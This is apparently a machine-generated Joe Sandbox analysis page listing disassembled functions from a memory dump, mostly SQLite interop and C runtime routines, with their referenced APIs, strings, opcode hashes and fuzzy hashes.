SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000,00000000,6BC12098,3304C483,7DE85000,7DE85000,6BCB6C5C,6BCB6C5C,6BCB6C5C,?,6BCB6C5C,?,6BC8DA3D,00000007,000000FF,00000000), ref: 6BC11365
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?,00000000,6BC12098,3304C483,7DE85000,7DE85000,6BCB6C5C,6BCB6C5C,6BCB6C5C,?,6BCB6C5C,?,6BC8DA3D,00000007,000000FF,00000000), ref: 6BC1137A
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(6BCC0C53,00000000,6BC12098,3304C483,7DE85000,7DE85000,6BCB6C5C,6BCB6C5C,6BCB6C5C,?,6BCB6C5C,?,6BC8DA3D,00000007,000000FF,00000000), ref: 6BC113A5
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000,00000000,6BC12098,3304C483,7DE85000,7DE85000,6BCB6C5C,6BCB6C5C,6BCB6C5C,?,6BCB6C5C,?,6BC8DA3D,00000007,000000FF,00000000), ref: 6BC113CA
_memset.LIBCMT ref: 6BC113D7

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: Iaa0f8e0c251cfd1d.$_memset
String ID:
API String ID: 1480580083-0
Opcode ID: b443d2a4fef563921f20c6643cab532286caab1738db2a45b4897acb314f08d3
Instruction ID: ff1b1510d0611e72ec32b80840754b791c1af47c9a5e88ffa763282d5a85fe5a
Opcode Fuzzy Hash: b443d2a4fef563921f20c6643cab532286caab1738db2a45b4897acb314f08d3
Instruction Fuzzy Hash: F101C4B1E2653197EB108F68AC01F5E73A86F10A58F4500A8F854BB644FB2DFB15D7D2

Function 6BC0DC60 Relevance: 7.5, APIs: 5, Instructions: 36COMMON

Download Yara Rule

APIs

SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC0DC6C
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?,?), ref: 6BC0DC75
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?,?,?), ref: 6BC0DC7E
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?,?,?,?), ref: 6BC0DC92
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?,?,?,?,?), ref: 6BC0DCAD

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: Iaa0f8e0c251cfd1d.
String ID:
API String ID: 372259789-0
Opcode ID: 740e3b5eca8cdd87589693048f43918f4b7f7e85a10aac31c018f6f71c38ba34
Instruction ID: 9f41d622d3f04dcad1e575a18d86d2753375f811f9055c89d0e0f35ade7d27b3
Opcode Fuzzy Hash: 740e3b5eca8cdd87589693048f43918f4b7f7e85a10aac31c018f6f71c38ba34
Instruction Fuzzy Hash: 66F079B1921B149F83209FBA98C1857FBE8BF0825C3404A2EE48A87A11D735F9488BD0

Function 6BBD8934 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 6BBD8940

Part of subcall function 6BBD641B: __getptd_noexit.LIBCMT ref: 6BBD641E
Part of subcall function 6BBD641B: __amsg_exit.LIBCMT ref: 6BBD642B

__getptd.LIBCMT ref: 6BBD8957
__amsg_exit.LIBCMT ref: 6BBD8965
__lock.LIBCMT ref: 6BBD8975
__updatetlocinfoEx_nolock.LIBCMT ref: 6BBD8989

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 88a7231600206d02ffaa3a40da02d768de34181bcd5f858d51550618caa27e60
Instruction ID: 842d5f0cae014dec26734fa69a6d756b7d525a2b5d7ec9d475d070bb6db52d6b
Opcode Fuzzy Hash: 88a7231600206d02ffaa3a40da02d768de34181bcd5f858d51550618caa27e60
Instruction Fuzzy Hash: DBF0B4329447909BE711AB759C0374D77A0AF0072EF516289D495AB2C0CF6C44429F5B

Function 6BC33EA0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 394COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6BC33F6C
_memset.LIBCMT ref: 6BC33FE1
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(FFFFFFFF), ref: 6BC34182

Strings

%s.xBestIndex malfunction, xrefs: 6BC341B0, 6BC341D6

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: _memset$Iaa0f8e0c251cfd1d.
String ID: %s.xBestIndex malfunction
API String ID: 2593926388-3856629991
Opcode ID: 52f5aa8fff8cbd309b4cd9959d3a9fee5c333f2f80a39e015d40ea6e2989341c
Instruction ID: 4d65b85db4ea13a79ca1f50f5da355f9aa44fdbbaae5eed8f611022775590cba
Opcode Fuzzy Hash: 52f5aa8fff8cbd309b4cd9959d3a9fee5c333f2f80a39e015d40ea6e2989341c
Instruction Fuzzy Hash: CCE1D470A107168FDB14CF68C481BAAB7F1FF49314F8042ADD85A87751E33AEA56CB90

Function 6BC2BD20 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 375COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6BC2BD75

Strings

rowid, xrefs: 6BC2BE5D
%.*z:%u, xrefs: 6BC2BF21
column%d, xrefs: 6BC2BE8D

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: _memset
String ID: %.*z:%u$column%d$rowid
API String ID: 2102423945-2903559916
Opcode ID: 12575551c0471b533f1fc025aa5bff1b294bd1aad5a4581b6e5f657ebc27427a
Instruction ID: d859225c133bb0e6dd1df41256e5b125d8815fa7360a443d85841a1c30ef3314
Opcode Fuzzy Hash: 12575551c0471b533f1fc025aa5bff1b294bd1aad5a4581b6e5f657ebc27427a
Instruction Fuzzy Hash: 9FD1E370E212069BEB05CF68C8817AFB7B4BF05718F1041A9D919DB241F739EB45CB91

Function 6BC44920 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 233COMMON

Download Yara Rule

Strings

domain error, xrefs: 6BC449E2

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID:
String ID: domain error
API String ID: 0-1959930803
Opcode ID: 32ec4aa51d611c451ac6d6bb5c2a86518c0b988483395c15cad7a978d9e88828
Instruction ID: 5da0a75786a6fe6f3753d553d2605baeb1c7a9dccc7724c89eac5c25cfa902b1
Opcode Fuzzy Hash: 32ec4aa51d611c451ac6d6bb5c2a86518c0b988483395c15cad7a978d9e88828
Instruction Fuzzy Hash: 62713B71A196508BC700CE69D89164EB3E1FFC5328F344B99E8A897341FB39DB458792

Function 6BC7A730 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 224COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 6BC7A956
database corruption, xrefs: 6BC7A951
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC7A947

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f
API String ID: 0-2469029621
Opcode ID: 580347d381445364f5ed279d55a8f1f50f3c0fb5d32eddcfc8d374f2d88ca21f
Instruction ID: c53e0e155f3325d38bd7caa0c395dbae52f3572076c18fd19badcfb4dc70d4fc
Opcode Fuzzy Hash: 580347d381445364f5ed279d55a8f1f50f3c0fb5d32eddcfc8d374f2d88ca21f
Instruction Fuzzy Hash: 8B71D2716292018BDB24EF68C48165A77A1FBC4364F1046FAFC99CB381F339D946CBA1

Function 6BC84790 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 222COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6BC84854

Strings

q, xrefs: 6BC8485F
%sON CONFLICT clause does not match any PRIMARY KEY or UNIQUE constraint, xrefs: 6BC849FF
%r , xrefs: 6BC849E5

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: _memset
String ID: %r $%sON CONFLICT clause does not match any PRIMARY KEY or UNIQUE constraint$q
API String ID: 2102423945-3220699075
Opcode ID: 8d5608541ed28b68e8332a7f65f648173655a64737d0d68700d60b973b363583
Instruction ID: f1e8bcf5157fba6d4b7b08363d5c89f758401b056dbb7e2621410aafc70435d4
Opcode Fuzzy Hash: 8d5608541ed28b68e8332a7f65f648173655a64737d0d68700d60b973b363583
Instruction Fuzzy Hash: 3F917071D152199FDB20CFA9D880AADBBB9FF49318F104199D858A7740F738AA51CFA0

Function 6BC44B80 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 205COMMON

Download Yara Rule

Strings

domain error, xrefs: 6BC44C36

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID:
String ID: domain error
API String ID: 0-1959930803
Opcode ID: aa52fcd43646bc78c0205328420aa165da33ed4666b5d4ddd2d30e43ae7ebb99
Instruction ID: b085dcb1f9bbc22e6f163e76778762606a2da5aab534792b5cade7577422ba60
Opcode Fuzzy Hash: aa52fcd43646bc78c0205328420aa165da33ed4666b5d4ddd2d30e43ae7ebb99
Instruction Fuzzy Hash: 37513932A296104BD700CF68D85174B73E1AF85329F3847A9E9A88B381FB39DB4583D1

Function 6BC44D90 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 203COMMON

Download Yara Rule

Strings

domain error, xrefs: 6BC44E56

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID:
String ID: domain error
API String ID: 0-1959930803
Opcode ID: ac5da4084aec58ae44b8c7830d9bdf7ff5ba3746c73ed8614881ea3228c9a129
Instruction ID: 14e85ffb6d75421140c6f715de96d2e662a6c06036954e5ee4e74a51e22aacdd
Opcode Fuzzy Hash: ac5da4084aec58ae44b8c7830d9bdf7ff5ba3746c73ed8614881ea3228c9a129
Instruction Fuzzy Hash: 965137726283014BD700DE78D88165AF3E5EFC5328F2447A9E968C7281FF39DB498392

Function 6BC25EA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 202COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6BC25F63
_memset.LIBCMT ref: 6BC260A4
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000,?,?,?,?,?,?,?,6BC29267,?,?,00000000,00000000,?,6BC33CE9,00000000), ref: 6BC260F0

Strings

0, xrefs: 6BC25FF8

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: _memset$Iaa0f8e0c251cfd1d.
String ID: 0
API String ID: 2593926388-4108050209
Opcode ID: c346cacff462dbb85401a777d09ed59a6b38c394a5161d68d8f8d96666018aea
Instruction ID: 295a45849c52e0a7bf0f78538369cc8f5d4f082b25f3f2be797a14522da8410f
Opcode Fuzzy Hash: c346cacff462dbb85401a777d09ed59a6b38c394a5161d68d8f8d96666018aea
Instruction Fuzzy Hash: 7D61C170E112159BEB04CFA8C881B5FB7B5AF45304F5480B8E919DF209F738DA45CBA1

Function 6BCB63D0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 186COMMON

Download Yara Rule

APIs

Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1

SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00024A9C,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BCB664E

Strings

%s at line %d of [%.10s], xrefs: 6BCB6647
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BCB662C, 6BCB6638
misuse, xrefs: 6BCB6642

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
API String ID: 2981141233-160653349
Opcode ID: 3d88cf449bb2f91611024e86815ce216b46930592f1e1e09a826e5734dbdc446
Instruction ID: 5f3cdc93f50f05c034763bf880c49fe84d631dfe81b5a224de0a6db76d6ff4d2
Opcode Fuzzy Hash: 3d88cf449bb2f91611024e86815ce216b46930592f1e1e09a826e5734dbdc446
Instruction Fuzzy Hash: 6971C370A11A549BDB10CF78C841B9EFBF0AF49318F0441E9D8589B341EB38EA99CF91

Function 6BBD1D3D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 6BBD1DCD

Part of subcall function 6BBD3AC0: __87except.LIBCMT ref: 6BBD3AFB

Strings

pow, xrefs: 6BBD1DA5, 6BBD1DC2

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: 5704eaf05de0ef85a389e90d6546ebb63d1c8bf7814bfd3627d5f6ec48385e80
Instruction ID: 996b23243d5f1e03183f00fe3c532c1d02b3a757bff79392270e0f8956e87330
Opcode Fuzzy Hash: 5704eaf05de0ef85a389e90d6546ebb63d1c8bf7814bfd3627d5f6ec48385e80
Instruction Fuzzy Hash: 05515D71E0C2C197DB116B28C94135E3BB4DB41B51F588AD8E4E5421EAEF3CC4D98A46

Function 6BC16020 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 165COMMON

Download Yara Rule

Strings

tokenchars, xrefs: 6BC160D9
separators, xrefs: 6BC16132

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID:
String ID: separators$tokenchars
API String ID: 0-258404482
Opcode ID: 4e3f2ff081030ff86a6bbd32ce212a7cecee84f9eba31c7472b34772a93df420
Instruction ID: d629cf2997a14614d56e651b9c8594fff68a923276997b2c7bfa38054f9da05c
Opcode Fuzzy Hash: 4e3f2ff081030ff86a6bbd32ce212a7cecee84f9eba31c7472b34772a93df420
Instruction Fuzzy Hash: BF51583162D6424BDB05CE28D8403AABBE5FF82315F2400FEEC959B342F739CA159392

Function 6BC55A40 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 154COMMON

Download Yara Rule

APIs

SI769271af19a2299d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,0000F437,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,?,?,?,?,?,?,?,?,6BC8593B), ref: 6BC55B20

Strings

%s at line %d of [%.10s], xrefs: 6BC55B19
database corruption, xrefs: 6BC55B14
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC55B0A

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$database corruption$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f
API String ID: 2981141233-2469029621
Opcode ID: babc0fefd9d82330b3f49f7fd0875cda405cd83e3d0bef2db21702c4939211e3
Instruction ID: c095fcf44eb7136f0ce81a3f6cec956f98d4996416644f2ffcc7728bda07338b
Opcode Fuzzy Hash: babc0fefd9d82330b3f49f7fd0875cda405cd83e3d0bef2db21702c4939211e3
Instruction Fuzzy Hash: 7551C032B11205ABD7009F65C885BAAB7B4EF40714F4481A5EE089B241F77CEB71CBE5

Function 6BC99E00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 139COMMON

Download Yara Rule

APIs

SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00018357,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,?,?,?,?,?,6BC9F24C,?,?,?,6BC73680), ref: 6BC99E26

Strings

%s at line %d of [%.10s], xrefs: 6BC99E1F
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC99E10
misuse, xrefs: 6BC99E1A

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
API String ID: 2981141233-160653349
Opcode ID: 4fcc013796147c65df48d2098ad46f7044701fb6a4eb93d310bc9d29daf36744
Instruction ID: c734f51e60c8341073a98dd487c384b6cc668020b7cdb34fbf8799c02147b834
Opcode Fuzzy Hash: 4fcc013796147c65df48d2098ad46f7044701fb6a4eb93d310bc9d29daf36744
Instruction Fuzzy Hash: 1441B6716142009FE724EFA8E881B5AB3E5EF84724F044669F959CB342F7B8EA058761

Function 6BC6D5C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 139COMMON

Download Yara Rule

APIs

